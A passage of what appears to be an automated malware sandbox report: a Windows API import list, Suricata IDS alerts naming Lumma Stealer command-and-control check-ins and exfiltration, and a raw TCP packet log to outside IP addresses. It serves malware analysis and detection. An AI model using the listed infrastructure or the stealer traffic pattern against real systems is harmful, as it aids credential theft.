                                                                                                                                                                                                                                                            user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                                                            msimg32.dllAlphaBlend
                                                                                                                                                                                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                                                                                                                                                                            version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                                                                                                                            mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                                                                                                                                            kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                                                                                                                                            advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                                                                                                                                                            comctl32.dllInitCommonControls
                                                                                                                                                                                                                                                            kernel32.dllSleep
                                                                                                                                                                                                                                                            oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                                                                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                                                                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                                                            comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                                                            shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                                                                                                                                            shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                                                                                                                                            comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                            ole32.dllCoDisconnectObject
                                                                                                                                                                                                                                                            advapi32.dllAdjustTokenPrivileges
                                                                                                                                                                                                                                                            oleaut32.dllSysFreeString

                                                                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                            2025-01-05T18:53:16.329003+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:16.883420+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449748104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:16.883420+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:17.374948+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:17.922014+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449749104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:17.922014+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:18.515960+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:20.066657+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:21.303531+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:23.459991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:24.497114+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:25.062321+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449755104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:25.568733+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:26.151646+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449756104.21.87.8443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:26.900823+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757185.161.251.21443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:27.654581+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758172.67.208.58443TCP
                                                                                                                                                                                                                                                            2025-01-05T18:53:28.054025+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.208.58443192.168.2.449758TCP

                                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.834229946 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.834263086 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.834341049 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.837259054 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.837286949 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.328807116 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.329003096 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.335135937 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.335144043 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.335400105 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.381798029 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.381885052 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.381932974 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.883435965 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.883538008 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.883630037 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.884828091 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.884828091 CET49748443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.884846926 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.884856939 CET44349748104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.891949892 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.891990900 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.892077923 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.892401934 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:16.892416000 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.374777079 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.374948025 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.376591921 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.376602888 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.376842976 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.378298044 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.378324986 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.378365993 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920720100 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920770884 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920805931 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920833111 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920857906 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920871973 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920885086 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920896053 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920897961 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920934916 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920945883 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.920989990 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.921384096 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.921427011 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.921456099 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.921471119 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.921478033 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.921514988 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.925441980 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.925580025 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.925647974 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.925709963 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.925724030 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.925736904 CET49749443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:17.925741911 CET44349749104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.057156086 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.057199001 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.057286024 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.057780981 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.057794094 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.515862942 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.515959978 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.518008947 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.518018007 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.518266916 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520286083 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520467997 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520500898 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520575047 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:18.520582914 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481411934 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481515884 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481586933 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481694937 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481709957 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590568066 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590619087 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590692043 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590986013 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590998888 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.066534042 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.066657066 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.089359999 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.089385986 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.089634895 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.109514952 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.109613895 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.109641075 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.640764952 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.640865088 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.640923977 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.641096115 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.641113997 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.826534986 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.826580048 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.826642990 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.827831984 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.827847958 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.303435087 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.303530931 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.309133053 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.309144020 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.309387922 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310583115 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310715914 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310746908 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310810089 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310817957 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.234651089 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.234750032 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.234797955 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.235145092 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.235162020 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.983515978 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.983562946 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.983848095 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.984354019 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.984365940 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.459888935 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.459990978 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.464291096 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.464303970 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.464555025 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.465815067 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.465914965 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.465920925 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.941768885 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.941848993 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.941927910 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.942102909 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.942116976 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030069113 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030109882 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030316114 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030610085 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030623913 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.497001886 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.497113943 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.498403072 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.498409986 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.498661995 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.500061989 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.500138998 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.500144005 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062330961 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062442064 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062659979 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062752962 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062776089 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.066040039 CET49756443192.168.2.4104.21.87.8
